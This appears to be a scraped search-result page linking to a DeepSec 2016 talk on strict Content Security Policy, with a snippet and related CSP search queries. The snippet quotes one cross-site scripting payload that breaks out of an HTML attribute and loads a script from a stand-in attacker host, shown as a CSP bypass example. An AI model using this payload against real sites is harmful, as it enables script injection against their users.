pttman

pttman Muster

Your very own big scoop

You are about to leave this site

and go to https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf

CSP Is Dead, Long Live Strict CSP! - DeepSec

URL schemes or wildcard in script-src (and no 'strict-dynamic'). ">'><script src=https://attacker.com/evil.js></script>. Bypasses.


People who searched for "Strict-dynamic" also searched for:

  1. content-security-policy
  2. Strict-dynamic' is present, so host-based allowlisting is disabled
  3. Content-Security Policy: ignoring 'unsafe-inline''' within script-src: 'strict-dynamic' specified
  4. Refused to frame '' because it violates the following Content Security Policy directive: frame-src
  5. Script-src-elem
  6. CSP nonce
  7. Inline script
  8. Content Security Policy script-src
